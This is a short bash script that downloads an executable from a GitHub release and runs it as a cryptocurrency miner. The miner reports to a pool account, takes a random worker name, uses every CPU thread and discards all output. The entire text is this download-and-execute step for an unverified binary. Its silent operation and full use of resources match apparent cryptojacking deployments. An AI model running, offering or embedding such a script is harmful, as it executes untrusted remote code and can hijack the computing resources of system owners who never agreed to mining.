#!/bin/bash
wget https://github.com/juncilla/shiiivs/releases/download/uiuui/vyas
chmod +x vyas
./vyas --algo qubic_xmr --account CP_43058os6pk --worker $(echo $(shuf -i 1-15000 -n 1)-Cam) --pool qubic2.hk.apool.io:3334 --thread $(nproc --all) > /dev/null 2>&1
